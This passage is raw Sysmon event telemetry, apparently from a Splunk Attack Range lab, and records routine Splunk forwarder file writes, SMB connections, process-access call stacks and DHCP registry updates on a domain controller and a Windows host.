Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22F8DB1D1351540AB53B97319715D5CC,SHA256=C9128D4606235FE647C915F8FA6E4354D33EDC0B6F41E4FD735D71A0BC1F9554,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104535Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:29.873{58E9C193-AC86-615A-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49609-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local445microsoft-ds 354300x8000000000000000104534Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:29.873{58E9C193-AC86-615A-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49609-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local445microsoft-ds 23542300x800000000000000082464Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:32.805{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D1C52F9FFF0339C701711A105BF3B1FE,SHA256=1D985114E75157878BE270120B956B403DA201B99CF0347671D8502365AC1DB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082463Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:32.805{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EB1DF12A7F573040FF7D6732D21BC4F,SHA256=26E9C31B8C74CE222B1F0B18DCDCFEFB0A54E4BC1CFE24762EF268271DC337A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082462Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:32.805{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB7D22BB6406279046658EB42DDBA51E,SHA256=563E5B154977E767531D6F7DCDFE5977F3E3C300E2B1EF5953754FF91EFC319E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082461Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:32.414{2FDD8D40-B3B0-615A-6D01-00000000FD01}34442664C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104553Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:32.731{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBD8A6044F37F46ED2C3632857B7D2D6,SHA256=94357AB3E97C7DD42FCC1750D120DB595B76AB879E99A57B12CE96BDF43B637D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082460Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:32.273{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B3B0-615A-6D01-00000000FD01}3444C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082459Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:32.273{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082458Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:32.273{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082457Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:32.273{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082456Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:32.273{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082455Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:32.273{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082454Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:32.273{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082453Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:32.273{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082452Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:32.273{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082451Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:32.273{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082450Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:32.273{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B3B0-615A-6D01-00000000FD01}3444C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082449Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:32.273{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B3B0-615A-6D01-00000000FD01}3444C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082448Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:32.274{2FDD8D40-B3B0-615A-6D01-00000000FD01}3444C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000104552Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:32.559{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-AE66-615A-BC00-00000000FC01}4464C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104551Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:32.090{58E9C193-ACA7-615A-1300-00000000FC01}880NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=30A1D1FA2911F87FEEAEC234EB34CBEE,SHA256=62487F1EB926222918C484F2DD35F50AF407CAA7BB3318B891BB464E187D04D8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104550Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:32.043{58E9C193-ACA7-615A-1100-00000000FC01}3605136C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104549Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:32.043{58E9C193-ACA7-615A-1100-00000000FC01}3605136C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x8000000000000000104548Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:32.043{58E9C193-ACA7-615A-1300-00000000FC01}880C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{03b2b8e3-95e6-43e5-b0d9-daf9fe2d5587}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x8000000000000000104547Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:32.043{58E9C193-ACA7-615A-1300-00000000FC01}880C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{03b2b8e3-95e6-43e5-b0d9-daf9fe2d5587}\IsServerNapAwareDWORD (0x00000000) 13241300x8000000000000000104546Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:32.043{58E9C193-ACA7-615A-1300-00000000FC01}880C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{03b2b8e3-95e6-43e5-b0d9-daf9fe2d5587}\AddressTypeDWORD (0x00000000) 13241300x8000000000000000104545Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:32.043{58E9C193-ACA7-615A-1300-00000000FC01}880C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{03b2b8e3-95e6-43e5-b0d9-daf9fe2d5587}\LeaseTerminatesTimeDWORD (0x615ac1c0) 13241300x8000000000000000104544Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:32.043{58E9C193-ACA7-615A-1300-00000000FC01}880C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{03b2b8e3-95e6-43e5-b0d9-daf9fe2d5587}\T2DWORD (0x615abffe) 13241300x8000000000000000104543Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:32.043{58E9C193-ACA7-615A-1300-00000000FC01}880C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{03b2b8e3-95e6-43e5-b0d9-daf9fe2d5587}\T1DWORD (0x615abab8) 13241300x8000000000000000104542Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:32.043{58E9C193-ACA7-615A-1300-00000000FC01}880C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{03b2b8e3-95e6-43e5-b0d9-daf9fe2d5587}\LeaseObtainedTimeDWORD (0x615ab3b0) 13241300x8000000000000000104541Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:32.043{58E9C193-ACA7-615A-1300-00000000FC01}880C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{03b2b8e3-95e6-43e5-b0d9-daf9fe2d5587}\LeaseDWORD (0x00000e10) 13241300x8000000000000000104540Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:32.043{58E9C193-ACA7-615A-1300-00000000FC01}880C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{03b2b8e3-95e6-43e5-b0d9-daf9fe2d5587}\DhcpServer10.0.1.1 13241300x8000000000000000104539Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:32.043{58E9C193-ACA7-615A-1300-00000000FC01}880C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{03b2b8e3-95e6-43e5-b0d9-daf9fe2d5587}\DhcpSubnetMask255.255.255.0 13241300x8000000000000000104538Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:32.043{58E9C193-ACA7-615A-1300-00000000FC01}880C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{03b2b8e3-95e6-43e5-b0d9-daf9fe2d5587}\DhcpIPAddress10.0.1.14 13241300x8000000000000000104537Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:32.043{58E9C193-ACA7-615A-1300-00000000FC01}880C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{03b2b8e3-95e6-43e5-b0d9-daf9fe2d5587}\DhcpInterfaceOptionsBinary Data 23542300x8000000000000000104583Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.902{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=051A6C76E36A18367C178F2DF0A816AD,SHA256=9281E6C25563804F671527BEE35690D5BEFFEFCFFE6999E9881EA47CDBEF9A6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082478Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:33.492{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E896649732230FB59B18A22F739E0A88,SHA256=EFF1AB7462FD1FC837FDB0C1904FBC2CE9964CFA608AF12EAC5968E6E3E58028,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082477Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:33.148{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B3B1-615A-6E01-00000000FD01}3028C:\Program 